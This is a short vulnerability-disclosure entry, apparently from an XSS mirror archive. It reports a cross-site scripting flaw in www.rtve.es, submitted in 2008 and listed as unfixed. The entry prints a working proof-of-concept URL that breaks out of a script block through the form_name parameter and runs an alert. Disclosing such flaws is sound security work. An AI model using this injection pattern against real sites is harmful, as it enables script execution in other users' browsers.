Security researcher OleMoudi, has submitted on 25/12/2008 a cross-site-scripting (XSS) vulnerability affecting www.rtve.es, which at the time of submission ranked 1906 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 09/07/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 25/12/2008 |
Date published: 09/07/2010 |
Fixed? Mail us! | Status: UNFIXED |
Author: OleMoudi |
Domain: www.rtve.es |
Category: XSS |
Pagerank: 1906 |
URL: http://www.rtve.es/common/calendar/calendario.html?form_name=href%3b%0A}%0Aalert(%27XSS%20-%20ALL%20 YOUR%20BASE%20ARE%20BELONG%20TO%20US%27)%3b%0Avar%20seleccionado%20%3d%20new%20Object()%3b%0A%2f%2f% 20--%3E%0A%3C%2fscript%3E%0A%3C!-- |
Click here to view the mirror
|
|
|